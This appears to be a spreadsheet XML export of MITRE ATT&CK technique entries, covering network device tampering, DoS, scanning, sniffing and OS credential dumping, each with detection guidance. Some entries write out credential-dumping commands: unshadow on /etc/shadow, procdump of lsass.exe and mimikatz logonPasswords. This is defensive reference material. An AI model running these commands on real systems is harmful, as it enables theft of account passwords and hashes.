In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/001</t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1104</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API &lt;code&gt;CreateProcess()&lt;/code&gt; or GNU &lt;code&gt;fork()&lt;/code&gt; will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. 
Utilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. </t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Firewall, Router ACL</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Boundary Bridging: Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</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</si>
  <si>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purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Network Denial of Service: Direct Network Flood</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Network Denial of Service: Reflection Amplification</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</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</si>
  <si>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File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\\\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1135</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</si>
  <si>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</si>
  <si>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T1040</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. 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
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>Credential Access, Discovery</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI)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
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)
 Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)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 
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM)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[Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.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[Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>OS Credential Dumping: /etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>OS Credential Dumping: Cached Domain Credentials</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>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module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>OS Credential Dumping: DCSync</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>ExtraHop; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>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module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Command: Command Execution, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
